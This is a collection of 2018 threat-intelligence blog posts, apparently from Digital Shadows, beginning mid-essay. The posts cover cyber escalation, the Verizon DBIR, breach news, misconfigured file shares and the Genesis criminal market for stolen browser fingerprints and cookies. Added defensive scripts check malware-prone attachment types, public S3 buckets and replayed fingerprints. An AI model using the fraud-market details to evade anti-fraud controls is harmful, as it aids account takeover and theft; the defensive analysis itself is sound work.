The “space between” referred to by Rosenbach reflects the sentiment that cyber operations offer a high level of plausible deniability and hence do not have the potential to escalate a conflict in the way a physical operation does.

However, a historical review of major cyber incidents shows this theory to be simply untrue. The distributed denial of service (DDoS) attacks on Estonia in 2007 are still used to frame Russia as a highly aggressive cyber actor, even though the attribution is thin. After the Sony hack of 2014, the United States was widely reported to have conducted a thinly veiled cyber-attack on North Korea’s internet connectivity. One legacy of the Stuxnet incident of 2010 was Iran prioritizing the development of its own cyber warfare capability, which bore bitter fruit in 2012 with the attack on Saudi Aramco.

What all these cases show is that far from being a consequence-free way of striking against an enemy, when attributed to a state (no matter how tenuously) cyber-attacks can lead directly to escalation. Herein lies the issue with cyber conflict: signalling between states in physical space such as the Cuban missile crisis is very clear; however, within cyberspace what is an escalating and de-escalating signal is very difficult to interpret.

Coupled with this is the issue of proportionality and what the cyber equivalent of a minor skirmish versus an all-out assault actually is. Here the potential for unplanned escalation between states rises exponentially. As a recent Chatham House paper commented: “there is a risk that any such [cyber] operation could be construed by the targeted state, or even the international community at large, as a use of force, leading to escalation of the situation”.


To conclude, what we have not seen to date is a “cross over event”, where a physical act of violence has provoked a cyber-attack that has in turn escalated to a retaliatory act of physical violence. Nevertheless, the discussions around events such as the Skripal assassination attempt have put this type of scenario on the agenda. Within this context, the idea that cyber is somehow “the space between”, where action has no consequence, is now simply incorrect.


To learn more, subscribe to our threat intelligence emails here.

Leveraging the 2018 Verizon Data Breach Investigations Report Tue, 10 Apr 2018 18:24:15 +0000 Today, the 11th edition of the Verizon Data Breach Investigations Report (DBIR) has been released. This year’s report includes 53,308 security incidents, 2,216 data breaches, 65 countries, and 67 contributors.

I participated in a panel discussion with the Verizon team on BrightTALK earlier today. Listen to the recording here.



The DBIR is one of the most anticipated annual reports and has endured for many years. If you’ll indulge me and take a trip down memory lane, here are some of the events you might remember from the year the first DBIR was written:

  • The first Twilight film was released, and the nation was divided by “Team Edward” or “Team Jacob.”
  • The Dark Knight starring Heath Ledger was released. This serves as a painful reminder of just how terrible Ben Affleck’s Batman is.
  • The stock market crashed on September 29, 2008.

Some of the key findings for me:

  • “68% of breaches took months or longer to detect.” In a world of real time this and real time that, I’d be happy to forgo the real time if I get better fidelity alerting. From both my time at Forrester and my time now as CISO, I generally view “real time intelligence” as “real time false positives” that are going to create more work for my security team. If we are looking at “months or longer” for breaches, I’d be happy to wait a few more hours or days to get better quality reporting that doesn’t DoS (denial of service) my team and reduce my overall time to detect.


  • Ransomware is the top flavor of malicious software, found in 39% of cases where malware was identified. You must have a plan for extortion attempts, and not just ransomware, but also DDoS extortion and intellectual property extortion. Your business continuity planning must take these scenarios into account. My colleague Harriet Gruen and FBI Supervisory Special Agent Sheraun Howard recently did a webinar on ransomware that you might find useful: “Emerging Ransomware Threats and How to Protect Your Data”.


  • I find the “Denial of Service: Storm preparations” section to be particularly relevant. This was a focus area of mine at Forrester and I also have to deal with this in my day job. DDoS “attacks, on average, are more like a thunderstorm than a Category 5 hurricane”. “You will find that most of the attacks are measured in minutes.” The question for CISOs is how much do I invest in a thunderstorm? Do I have enough budget to prep for a Category 5 hurricane? When it comes to budget tradeoffs these are important questions.  Having intelligence on threat actors who conduct these activities against your industry can help with this calculation.


  • JavaScript (.js), Visual Basic Script (.vbs), MS Office and PDF tend to be the file types found in first-stage malware. This isn’t breaking news, but it’s a good reminder to make sure we incorporate this into our vulnerability management triage process. We should be tracking the software, technologies and CVEs that malware is exploiting.


Source: Verizon DBIR
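One way to act on that reminder at the mail gateway or in attachment triage is to classify attachment names by the first-stage file types the report calls out. The script below is an added example, not code from this post or from Verizon; the attachment names are constructed, and the extension sets (the macro-enabled Office variants and the .jse/.vbe/.wsf script forms in particular) are an assumption that widens the report's ".js, .vbs, Office, PDF" list to what a triage queue actually sees.

```python
"""Flag e-mail attachments whose file type matches the first-stage malware
delivery formats named in the DBIR write-up (.js, .vbs, Office, PDF).

Added illustration, not part of the original post. The sample attachment
names below are constructed for the example."""
import os
from typing import List, Tuple

# Extensions grouped by family. The Office set is an assumption that widens
# ".doc/.xls" to the macro-enabled and legacy variants commonly seen in triage.
FIRST_STAGE_TYPES = {
    "script": {".js", ".jse", ".vbs", ".vbe", ".wsf"},
    "office": {".doc", ".docm", ".dot", ".dotm", ".xls", ".xlsm", ".xlsb",
               ".ppt", ".pptm", ".rtf"},
    "pdf": {".pdf"},
}


def classify_attachment(filename: str) -> Tuple[str, List[str]]:
    """Return (family, notes) for an attachment name, or ("", []) if benign by type.

    Handles mixed case and double extensions such as 'invoice.pdf.js', where the
    last extension decides what the operating system would execute.
    """
    name = filename.strip().lower()
    root, ext = os.path.splitext(name)
    notes: List[str] = []
    family = next((fam for fam, exts in FIRST_STAGE_TYPES.items() if ext in exts), "")
    if family:
        # A second, innocuous-looking extension before the real one is a classic lure.
        _, inner = os.path.splitext(root)
        if inner and inner not in FIRST_STAGE_TYPES.get(family, set()):
            notes.append(f"double extension: {inner}{ext}")
        if family == "office" and ext.endswith("m"):
            notes.append("macro-enabled Office format")
    return family, notes


def triage(attachments: List[str]) -> List[dict]:
    """Run classify_attachment over a batch and keep only the hits."""
    hits = []
    for att in attachments:
        family, notes = classify_attachment(att)
        if family:
            hits.append({"file": att, "family": family, "notes": notes})
    return hits


# Constructed sample batch; realistic-looking names, not from any real mailbox.
SAMPLE_ATTACHMENTS = [
    "Q2_report.pdf",
    "Invoice_0422.PDF.js",
    "timesheet.xlsm",
    "photo.jpg",
    "readme.txt",
    "order.vbs",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_ATTACHMENTS):
        print(hit)
```

The family label is what you would join against the software and CVE tracking mentioned above: an "office" hit maps to the Office patch level of the recipient's endpoint, a "script" hit to whether Windows Script Host is still enabled for that user population.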

Since we are eleven years into the DBIR, I suspect that you are familiar with how to leverage the report, but just in case you aren’t, here are some quick suggestions:

  • The report is filled with great content, and there is a lot of it. The report is nearly 50 pages without the appendices. I found it useful to read through it once in its entirety before I started making notes. I understood the full context and then I could start breaking it down into “byte-sized” bits.


  • Yesterday was National Unicorn Day, and you may very well be a unicorn. Not everything in the DBIR will apply to your business. Make sure to take this into consideration while reading the report.


  • Go to Figure 28 “Industry Comparison” on page 26, look at your industry and the attack patterns that are most common in the DBIR data set. Do you have the appropriate security controls in place to detect and mitigate these attacks?


Source: Verizon DBIR

  • You can use the attack patterns to build intelligence requirements and to kick start your collection plan. For example, if you are in the banking industry you can build or buy collection capabilities around these areas:
    • Banking Trojans (tools, actors, exploits, configuration files)
    • Denial of service (tools, actors, target selection)


I’ve already read through the DBIR multiple times and with each subsequent reading I find something else that is useful. One final recommendation that I’ve been suggesting for many years is to create your own version of the DBIR based on your own intrusion and breach data. Nothing is more relevant than what is happening within your own organization. The DBIR has some great examples of graphics that you can incorporate into your own tailored reports, which you can then use to communicate the threat landscape to your executives.


To learn more, subscribe to our threat intelligence emails here.

Introducing Shadow Search – Quickly enable deeper research and investigation Tue, 10 Apr 2018 01:35:30 +0000 All enterprises face key challenges in their quest to protect their organization from cyber threats. One challenge I hear consistently from security professionals is the difficulty of keeping up with the volume of alerts generated by their security controls. The problem they face is that each alert needs to be analyzed and understood before a decision is made. To do that, teams are using a range of tools and information like open source feeds, specialist news or blogs, and threat intelligence sources to enrich their understanding of the alert before they can make a decision. This enrichment takes time. Unfortunately, time is perhaps the scarcest commodity for security professionals because there aren’t enough of us, the number of alerts is ever increasing and the pressure is on because the costs of poor decisions are going up.

Shadow Search, the enhanced search capability we are adding to our SearchLight service, is all about giving a bit of time back to security teams. Our customers were telling us that the insight we provided with our Digital Shadows alerts could be really useful in support of their security operations process for alerts from other sources. When we looked at this, we felt there was an opportunity to add more information sources and scope to make the massive amounts of data from the deep, dark, and open web more accessible and discoverable from the SearchLight portal, better supporting these customers as they make decisions.

So I am excited that we have just launched our new “Shadow Search” capabilities, designed specifically to provide the data that security teams need to make decisions faster. Shadow Search transforms the threat intelligence search function, delivering market-leading coverage and user experience. Users now have unrestricted access to a vast and expanding Digital Shadows content repository to investigate and pivot between data sources, threat actor information and incidents.



Shadow Search includes security relevant sources as diverse as criminal forums, reputable security blogs and dark web pages, in addition to Digital Shadows cyber threat intelligence (CTI) and third-party threat intelligence feeds. Organizations can use this practical and actionable information to enhance their understanding of threats, in their business context. Examples of use cases include the ability to:

  • Investigate security incidents – pivot from observed incidents on your network to gain further context about a threat or threat actors
  • Monitor global events and industry trends – access to real-time data and finished threat intelligence allows you to track threats associated with geography, sector or area of interest and stay ahead of the unfolding developments
  • Manage third party risk – identify weaknesses in your supply chain, including if a supplier has been the subject of a breach, or vulnerabilities in your software are being commonly exploited in the wild
  • Research threat information to help prioritize resource usage – detect new activity by tracked threat actors and changes to malware campaigns to support business cases

Analysts can save their searches and return to them or subscribe to receive updates that meet their specific enterprise criteria.

Shadow Search benefits include the following:

  • Immediate access to threat data – Get instant access to raw collection when you need it.
  • Broad coverage – A vast repository of data including curated threat intelligence, content for hard to reach web sources (dark web) and more, including exploits and observables, all in one place opened up for search.
  • Relevant results – Smart filters and powerful search syntax allowing users to focus in on the information that’s most relevant to them.
  • Actionable information – Rich results with associated observables, intuitive interface, and full export enables users to make operational use of the results.

Collaborative development

Having only recently joined Digital Shadows, I got my hands on the capability after it had been extensively trialed by our beta customers; a huge thank you goes to those who collaborated with us on that process. I found the UI intuitive, and the timeline and summary views help put the results in context.

We’ve added features like advanced filtering by source, date range and information type and export capabilities in direct response to the feedback we have had from the beta. See the screen shot above for a view of the Shadow Search interface, but only a hands-on demo really does it justice. It will be at RSA Conference for those who are attending and if you can’t make it, we would be happy to arrange a demo for you.

Our beta clients now tell us it’s easy to investigate an incident and pivot to related research and forums or research threat actors and that the unrestricted access to the original sources and proprietary Digital Shadows cyber threat intelligence (CTI) is very welcome. Most importantly, we are now hearing that it is saving them time.

One beta test meeting with a worldwide manufacturer particularly stands out for me: “You’ve incorporated all my requirements and suggestions; this is awesome. It will save me time and help me focus on priority research and threat investigations.”

In Summary

I think Shadow Search is a truly valuable addition to our SearchLight service and will help our clients to use our wealth of knowledge to investigate threats and make decisions faster, giving back valuable time to the security operations function. Learn more about Shadow Search by downloading our datasheet or requesting a demo. It will be available to all customers in Q2.


Shadow Talk Update – 04.09.2018 Mon, 09 Apr 2018 20:52:07 +0000 Back from the Easter break, this week’s Shadow Talk discusses the re-emergence of WannaCry, the exposure of Aggregate IQ data, the exposure of 1.5 billion files through misconfigured services, lessons learned from the Panera breach, an emerging new criminal market, and much more.

Oil pipeline company disrupted by unidentified cyber attack

Certain parts of the electronic data interchange (EDI) communication system used by a US oil and gas pipeline company were rendered temporarily unavailable by an unspecified online attack. At the time of writing, the attackers’ tactics, techniques and procedures (TTPs) remain undetermined. The victim company, Energy Transfer Partners LP, stated that the flow of natural gas remained unaffected throughout the incident, and that no information was stolen or compromised. Oil and gas companies, including those affiliated with national infrastructure, continue to be prime targets for financially motivated and espionage-seeking threat actors.

Malaysian central bank thwarts SWIFT attack

Bank Negara Malaysia claimed to have prevented a theft of funds via the Society for Worldwide Interbank Financial Telecommunication (SWIFT) system. The attackers had tried to make fraudulent wire transfer requests through the SWIFT platform. Bank Negara Malaysia stated that no funds were stolen, and that the payment and settlement systems were not affected or disrupted. In the past six months, several financial entities in Russia and South-East Asia have been targeted by attackers attempting to steal funds via SWIFT. The continued targeting of financial institutions and their geographic concentration indicate a single threat group may be responsible. Given that these attacks target banks’ internal security systems, rather than the central SWIFT system, the perpetrators may perceive these locations as having weaker internal security standards.

Boeing production plant infected by WannaCry

The “WCry” (aka WannaCry) malware reportedly infected a small number of computers at a Boeing production plant, triggering concerns that airframe testing equipment and software may have been compromised. Boeing later stated that no disruption had been caused to its production programs. It remains unknown whether this version of WCry was the same as that used in the widespread campaign of May 2017, and therefore whether the same threat actor is responsible. Alternatively, this version may have been spoofed and exploited by different threat actors to encourage swift payment of the ransom through WCry’s notoriety.

Luxury retailers hit by credit card breach

Credit card details held by luxury retailers Saks Fifth Avenue and Lord & Taylor were breached, and a portion of the data was advertised for sale on the dark web marketplace Joker’s Stash on 28 Mar 2018. Security research company Gemini attributed the breach to the financially motivated threat actor “FIN7”; however, evidence for this attribution remains unclear. The retailers’ parent entity, Hudson’s Bay Company, did not specify how many customers were affected, but more information may be released in the near future (next three months).

Millions of Panera customers’ personal details allegedly compromised

On 02 Apr 2018 security researchers reported that a flaw on PaneraBread[.]com, the main website of United States bakery-café-restaurant chain Panera, had potentially left over seven million customer records exposed since Aug 2017. Threat actors could use the data for identity theft and fraud, although Digital Shadows’ research has uncovered no evidence that the records have been used maliciously. The flaw appears to have been fixed on 02 Apr 2018, but prior to that the information could have been downloaded by threat actors and it may remain available.

ChessMaster observed exploiting CVE-2017-11882

Espionage campaign ChessMaster has shown updated TTPs in its ongoing targeting of a variety of industries in Japan, now using an exploit for CVE-2017-11882, a vulnerability in Microsoft Office’s Equation Editor. Exploitation of this vulnerability has been observed several times over the past five months in campaigns by various threat actors. Enterprises using Microsoft Office 2007 to 2016 should apply the relevant security updates from Microsoft.

One CISO’s Recommendations for Making the Most of RSA Conference Sessions Mon, 09 Apr 2018 15:19:15 +0000 Last week, Enterprise Strategy Group (ESG) principal analyst, Jon Oltsik, wrote an article for CSO titled: “RSA Conference: CISOs’ top 4 cybersecurity priorities.” Jon highlighted four areas that security executives will be looking for at next week’s RSA Conference:

  1. Executive-level threat intelligence (Jon highlighted Digital Shadows in this category)
  2. Integrated security platforms
  3. Business risk
  4. Changing security perimeters

In the past, I’ve written my own RSA Conference (RSAC) preview blogs and Jon’s article reminded me that I should do it again. A few things to note before I get started:

  • This blog is going to be focused on conference talks that will resonate with most CISOs.
  • I know there will be many other activities going on next week and you have limited time, so let me help you maximize the time you have allotted for talks.
  • You should absolutely take advantage of “hallwaycon” and all the networking opportunities associated with the RSAC week. This will get you the best return on your investment.
  • You could just go to the RSAC “Sessions & Events” page and search by the “Core Topic” of “C-Suite View” or “Security Strategy,” but your time is precious. So, to save you some, I spent the morning going through the RSAC agenda, so you don’t have to.
  • I focused on the following areas: (1) investment, metrics, and communication, (2) GDPR, (3) recruiting and retaining staff, (4) third party risk, (5) cloud native security, and (6) national security.


Here are my recommendations for the RSAC talks you should check out:

  • The Innovation Sandbox. This isn’t a talk, but something I highly recommend nevertheless. I’m a big fan of the Innovation Sandbox, and while I was at Forrester Research I moderated several panels at the event. I admit I could be a bit biased towards it. The Innovation Sandbox is a great way to track startups that could help you solve some of the challenges that CISOs face. It is also fun to watch the pitches, and you can also pick up techniques to improve your own presentation style/public speaking. This can be very useful, particularly as you think about it applying to your own board presentations.
  • Investment, metrics, and communication. This year, there is no shortage of CISO focused talks. I suggest the following as the topics really resonate with me and there are also real work examples from practitioners in the mix. These talks also align with Jon Oltsik’s business risk area from his CSO article.
    • Stop Translating, Start Defending: Common Language for Managing Cyber-Risk TECH-W04
    • Building and Selling Your Security Strategy to the Business STR-W14
    • Creating Order from Chaos: Metrics That Matter GRC-W04
    • Implementing a Quantitative Cyber-Risk Framework: A FinSrv Case Study STR-W02
    • Security Programs. ROI not CYA EXP-R14
    • Charting a Clear Course: Prioritizing Security Investments and Activities STR-T07
    • 10 Tenets of CISO Success STR-W04
    • Inside Cyber-Balance Sheets: A Rare Window on Digital Risk in the Boardroom CXO-R14
  • GDPR. Worried about GDPR? You will be. If you deal with European Union citizen data, this year’s RSAC has you covered and it’s important since GDPR enforcement is now “next month.” I’m almost as excited for GDPR as I am for the Deadpool sequel featuring Thanos, and the new Han Solo movie (please, please save it Donald Glover). While I work on my Privacy Impact Assessments, consider these talks:
    • How to Tackle the GDPR: A Typical Privacy and Security Roadmap PRV-T10
    • The GDPR Is Only for Europe—Right? GRC-R02
    • GDPR Compliance—You Forgot Your Digital Environment GRC-R12
  • Recruiting and retaining staff. I think the “cyber security talent shortage” is a self-fulfilling prophecy. Don’t be a statistic, and don’t succumb to the hype! I think these talks can help you:
    • A NICE Way to Find and Keep Cybersecurity Workers PROF-W04
    • The Cybersecurity Job Seekers Report: Results and Implications AST1-W02
    • The Life and Times of Cybersecurity Professionals AST3-R02
  • Third party risk. I’m always looking for ways to get better at managing third party risk and if you read the headlines, nearly everyone else should be looking as well. I would’ve liked to have seen more talks on this topic. I included some Peer2Peer talks in here as well:
    • Personality Profiling Your Third Parties for Effective Supplier Management STR-T08
    • The Supply Chain Threat GRC-T10
    • Effectively Managing a Third-Party Technology Risk Program P2P4-R05
    • Third-Party Risk Assessment Tilt-A-Whirl. Stop the Ride, I Want to Get Off! P2P3-W04
  • Cloud security. Cloud security is a key component of our security program and the same is likely true for you. I really like the contrast of the following two talks. In the first, you have one of, if not the top industry analyst who covers cloud security, Rich Mogull (of Securosis fame). In the second, you have the founder and former CEO of Tim Prendergast, who is now the Chief Cloud Officer at Palo Alto Networks. was recently acquired for a cool $300 million.
    • Building and Adopting a Cloud-Native Security Program CSV-W14
    • Is Cloud-Native Security Enough? SPO3-W14
  • National Security. I’m a self-professed national security geek and I think all CISOs need to track geopolitical and national security issues. Check out these talks:
    • Cyberwar Game: Behind Closed Doors with the National Security Council EXP-T07 (I’ll pretty much watch anything Jason Healey is involved in)
    • DARPA R&D Enabling US Cyber-Deterrence PNG-F03R (DARPA is cool, and they are doing this talk twice!)
    • Former NSA and Israeli Intelligence Directors on Resilience EXP-F01 (Despite getting 8200’d/NSA’d to death at Forrester, I still want to see this talk).

Am I missing any talks that resonate with you? Please share.

I know that many people (cue the Infosec Twitterverse) bash big security events like RSAC; my suggestion is to ignore that and make the most of the event. Next week is a great opportunity to gain knowledge that you can bring back to your team and an excellent opportunity to build your professional network.

Next week is also a great time to unwind and step away from the chaos that is being an information security professional.  Digital Shadows is sponsoring the “Security Leaders” party on Tuesday night April 17th at City View @ Metreon. Come join us and have a good time with your peers and make some new friends. You can register here.


When Sharing Is Not Caring: Over 1.5 Billion Files Exposed Through Misconfigured Services Thu, 05 Apr 2018 12:23:14 +0000 Our recent report, “Too Much Information”, discovered over 1.5 billion files exposed by a host of services, including Amazon S3 buckets, rsync, SMB, FTP, NAS drives, and misconfigured websites.


We love data, and we need ways to store, share and transfer this data to other individuals and parties. There are a range of services that are used to do this, and one way that has gained popularity over the last few years is cloud storage, specifically Amazon Simple Storage Service (S3) buckets. Unfortunately, many administrators misconfigure these S3 buckets rendering the contents publicly-accessible. Barely a month goes by without another open S3 bucket being discovered – who remembers the data of 198 million voters being exposed last year?

However, S3 buckets are not alone. In our research we found that they only constituted seven percent (7%) of the exposed files we found. Many other services that are used to store, share, or transfer data are also frequently misconfigured:

  • File Transfer Protocol (A network protocol used to transfer computer files);
  • rsync (A way of transferring and synchronizing files);
  • Server Message Block (A network file sharing protocol);
  • Network-attached storage devices (Devices often used to back up home computers).

Combined, these services expose over 1.5 billion files, with SMB, rsync and FTP accounting for 33, 28, and 26 percent respectively.
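A practitioner reading this will want a way to catch the S3 part of the problem before a third party does. The check below is an added example, not code from the report or from AWS; it evaluates the JSON shapes that the bucket ACL and bucket policy APIs return, so it runs offline on exported configuration with no credentials. The sample ACL and policy documents are constructed, and the finding strings are my own wording.

```python
"""Offline check for the S3 misconfiguration described in the post: a bucket
ACL or bucket policy that grants access to everyone.

Added example, not part of the Digital Shadows report. It evaluates the JSON
returned by GetBucketAcl / GetBucketPolicy, so it can run on exported
configuration without AWS credentials; the sample documents are constructed."""
import json
from typing import Dict, List

# The two predefined groups that make an ACL grant public. These URIs are the
# real AWS group identifiers.
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers (anyone on the internet)",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers (any AWS account)",
}


def _principals(principal) -> List[str]:
    """Normalise a policy Principal field ("*", {"AWS": "*"}, {"AWS": [...]}) to a list."""
    if isinstance(principal, str):
        return [principal]
    out: List[str] = []
    for val in principal.values():
        out.extend(val if isinstance(val, list) else [val])
    return out


def public_acl_grants(acl: Dict) -> List[str]:
    """Return one finding per ACL grant that targets a public group."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            findings.append(f"ACL grants {grant.get('Permission')} to {PUBLIC_GROUPS[grantee['URI']]}")
    return findings


def public_policy_statements(policy: Dict) -> List[str]:
    """Return one finding per Allow statement whose principal is the wildcard.

    A Condition block may narrow the statement (for example to a VPC endpoint),
    so such statements are flagged for review rather than treated as public.
    """
    findings = []
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        if "*" not in _principals(stmt.get("Principal", {})):
            continue
        actions = stmt.get("Action", [])
        actions = actions if isinstance(actions, list) else [actions]
        qualifier = " (has Condition, review scope)" if "Condition" in stmt else ""
        findings.append(f"policy allows {', '.join(actions)} to Principal *{qualifier}")
    return findings


def audit_bucket(acl: Dict, policy_json: str = "") -> List[str]:
    """Combine both checks; policy_json is empty when the bucket has no policy."""
    findings = public_acl_grants(acl)
    if policy_json:
        findings += public_policy_statements(json.loads(policy_json))
    return findings


# Constructed samples: an ACL with a public-read grant, a policy open to everyone,
# and the hardened ACL that only the owner can use.
SAMPLE_ACL = {
    "Owner": {"ID": "exampleowner"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "exampleowner"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
    ],
}
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::example-bucket/*"},
    ],
})
HARDENED_ACL = {
    "Owner": {"ID": "exampleowner"},
    "Grants": [{"Grantee": {"Type": "CanonicalUser", "ID": "exampleowner"},
                "Permission": "FULL_CONTROL"}],
}

if __name__ == "__main__":
    for finding in audit_bucket(SAMPLE_ACL, SAMPLE_POLICY):
        print("FINDING:", finding)
    print("hardened bucket findings:", audit_bucket(HARDENED_ACL))
```

In practice you would feed it the output of `aws s3api get-bucket-acl` and `aws s3api get-bucket-policy` for each bucket, and pair the check with the account-level S3 Block Public Access setting, which stops the grants this script looks for from being created at all. The equivalent question for the other services in the list is whether anonymous or guest access is enabled on an Internet-facing SMB, rsync or FTP listener.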


What’s the damage?

The amount of exposed data is staggering. Over twelve petabytes of data is exposed (12,000 terabytes). For context, this is over four thousand times larger than the “Panama Papers” leak (2.6 terabytes). It’s also 12 thousand times larger than the Deep Root exposure of 198 million voters in 2017. Almost all countries are affected, but the United States experienced the most exposure with 239,607,590 files.


Figure 1: Geographical distribution of exposed data


Types of Exposed Data

It’s not just the volume but the sensitivity of the data that is a major cause for concern. There were a number of instances of high severity exposure of personal information, intellectual property, and security assessments.

There is an incredible amount of personal data exposed, including payroll, tax return and healthcare information. If we consider how much is exposed (the news that the data of 87 million Facebook users may have been harvested is a good example), this adds significantly to this already rich trove of data, providing more and more information that could be used for malicious purposes such as social engineering and fraud. Furthermore, with GDPR fast-approaching, there are clear regulatory concerns for organizations surrounding the protection of personal data, particularly if employees and contractors are copying and archiving work files using cloud storage and NAS solutions.


Figure 2: Types of publicly-available personal information


Our report also highlights numerous cases of intellectual property that is also exposed through these services. In one instance, a technology company providing Electronic Medical Records software had their copyright application and full source code publicly-available. In another instance, an energy company had sensitive details and diagrams of their patent-pending technology exposed. Loss of intellectual property can also have considerable financial and reputational impacts.


Figure 3: Types of publicly-available intellectual property


Finally, there were a worrying number of security assessments made available. This includes thousands of penetration tests, network diagrams, and security audits. We found a series of security documents belonging to a leading European supplier of electronic identification services used within the banking industry. These files contained in-depth security assessments, source code testing results, and vulnerability scanning reports that revealed details on insecure servers. These infrastructure reports exposed server locations and hosting IPs, missing software patches, port information, CVE numbers, and vulnerability descriptions that may allow an attacker to modify data, inject malicious code, or perform man-in-the-middle attacks. This type of information is a goldmine for attackers targeting organizations, and an attacker will typically spend weeks, if not a couple of months performing reconnaissance on their targets to glean this exact type of information.


Figure 4: Types of publicly-available security assessments


Download a copy of our report to learn more about the types of sensitive data these services are exposing, and how you can help to reduce this problem.



Genesis Botnet: The Market Claiming to Sell Bots That Bypass Fingerprinting Controls Tue, 03 Apr 2018 15:18:06 +0000 An emerging criminal market, Genesis store, provides more effective ways to impersonate a victim’s browser activity, focusing on individual bots rather than huge botnets, and monetizing them in a completely different way. Such an approach may allow criminals to utilize bots with higher efficiency, thus revealing new attack and fraud methods.


Figure 1: Adverts for the Genesis Store on a carding forum

Evolution of fingerprinting controls

Device fingerprinting collects information about a computer in order to identify an individual user. This is a pretty handy technique for retailers and banks who want to prevent fraudsters. Typically, anti-fraud solutions take known fraudulent activity and seek to block transactions that have a similar device fingerprint. This has become a cat-and-mouse affair, as criminals look to randomize their fingerprint with the help of various online services (many of which were covered in our report, Inside Online Carding Courses Designed for Cybercriminals). In response, anti-fraud technologies take into account a broader set of characteristics.

Criminals, therefore, look to the machines of their victims in order to evade detection. However, obtaining this array of information is challenging. That’s where Genesis comes in. Genesis Store seeks to provide a single solution to emulate this approach, providing access to victims’ device footprints, accounts, and personal information. The store – registered in November 2017 and still in beta mode – claims to be the result of research conducted across the antifraud technologies used by 283 major banks and payment systems.


Access to a wide range of data

In order to emulate the legitimate users, Genesis provides customers with a wide range of information such as fingerprints, cookies, logs, saved passwords, and personal information.

This information is acquired from web injects, form grabbers and passwords saved in browsers. As these sources get more detailed or updated data, that data is automatically pushed into the store and made available to users. While this means that not all information is verified, it provides a more scalable business model for the administrators.


Figure 2: A screenshot of the Genesis Store


Browser plugin

For less than fifty dollars, users can buy a bot on the Genesis site, which includes the fingerprint, accounts, and cookies (unsurprisingly, the store does not use or sell any products connected with the Russian Commonwealth). For free you also get the Genesis Application, a browser plugin.

The plug-in claims to work with any operating system on Chrome-like browsers (Chrome, Iron, Iridium and others) and provides a seamless way to access the user fingerprint. The plug-in automatically updates and offers additional information on cookies and login data, as well as holder details, security answers, and card details.


Figure 3: The Genesis Security plugin


Innovative monetization techniques

Instead of focusing on selling large quantities of bots in bulk, Genesis focuses on the individual quality of each bot. The actors behind the botnet also have a very clear idea of how to monetize this. For example, their configurations must be used with their own plugin, and will not work without doing so. This is a similar business model to buying games for a Nintendo – you need to buy their own cartridges.


What to look out for

The site makes big claims about its capabilities and it will live and die by how it matches up to these promises. As with all new marketplaces, its success will also depend on user adoption, quality of goods, site security and user experience. Nevertheless, Genesis is still in beta mode yet appears to have picked up a good amount of interest since it was registered in November 2017. There are over 1500 bots available to buy and, at the time of analysis, eight bots had been purchased in the last 20 minutes.

As the site develops, grows out of beta mode and its claimed capabilities are realised, the shift to using more individual bots could have an impact on organizations’ ability to combat fraud.
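The defensive takeaway from the fingerprinting and browser-plugin sections above is that a device fingerprint match has to be weighed against signals the seller cannot package with the bot. The risk-scoring routine below is an added example, not code from the post or from any anti-fraud vendor; the fingerprint attribute set, the weights and thresholds, and the device profile and login attempts are all constructed assumptions for illustration.

```python
"""Defensive illustration of why a device fingerprint alone is a weak
anti-fraud control once fingerprints and cookies are sold as a package.

Added example, not from the post or from any vendor. It builds a fingerprint
hash from browser attributes (a constructed, simplified attribute set), then
scores a login by combining that match with server-side signals the bought
bundle does not carry: the network the session arrives from and its geography."""
import hashlib
import json
from dataclasses import dataclass, field
from typing import Dict, List


def fingerprint_hash(attributes: Dict[str, str]) -> str:
    """Stable hash over canonicalised client attributes (user agent, screen, etc.)."""
    canon = json.dumps(attributes, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canon.encode()).hexdigest()


@dataclass
class KnownDevice:
    fp_hash: str
    usual_asn: str            # autonomous system the device normally logs in from
    usual_tz_offset: int      # UTC offset in minutes reported by the browser
    recent_login_countries: List[str] = field(default_factory=list)


@dataclass
class LoginAttempt:
    attributes: Dict[str, str]
    asn: str
    tz_offset: int
    country: str


def risk_score(known: KnownDevice, attempt: LoginAttempt) -> Dict[str, object]:
    """Score 0..100; a fingerprint match lowers risk but cannot by itself clear a login.

    Weights and thresholds are illustrative assumptions, not a vendor model.
    """
    reasons: List[str] = []
    score = 0
    if fingerprint_hash(attempt.attributes) != known.fp_hash:
        score += 40
        reasons.append("fingerprint mismatch")
    # Server-observed signals: a replayed bundle cannot forge the source network.
    if attempt.asn != known.usual_asn:
        score += 30
        reasons.append("unfamiliar network (ASN)")
    if attempt.country not in known.recent_login_countries:
        score += 20
        reasons.append("country not seen recently")
    # Browser-reported timezone should agree with the device history.
    if attempt.tz_offset != known.usual_tz_offset:
        score += 10
        reasons.append("timezone offset differs from device history")
    decision = "allow" if score < 30 else ("step-up" if score < 60 else "block")
    return {"score": score, "decision": decision, "reasons": reasons}


# Constructed victim device profile and two login attempts.
VICTIM_ATTRS = {"ua": "Mozilla/5.0 (Windows NT 10.0) Chrome/65", "screen": "1920x1080",
                "lang": "en-US", "fonts": "Arial,Calibri,Segoe UI"}
VICTIM = KnownDevice(fp_hash=fingerprint_hash(VICTIM_ATTRS), usual_asn="AS7922",
                     usual_tz_offset=-300, recent_login_countries=["US"])
GENUINE = LoginAttempt(VICTIM_ATTRS, asn="AS7922", tz_offset=-300, country="US")
# Identical fingerprint and timezone, but arriving from a different network and country.
REPLAYED = LoginAttempt(dict(VICTIM_ATTRS), asn="AS12345", tz_offset=-300, country="DE")

if __name__ == "__main__":
    print("genuine :", risk_score(VICTIM, GENUINE))
    print("replayed:", risk_score(VICTIM, REPLAYED))
```

The point of the weighting is that a perfect fingerprint match scores zero on its own and the decision turns on the network and geography signals, so a bot bought with the victim's fingerprint still lands in step-up authentication unless it also arrives from the victim's usual network.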


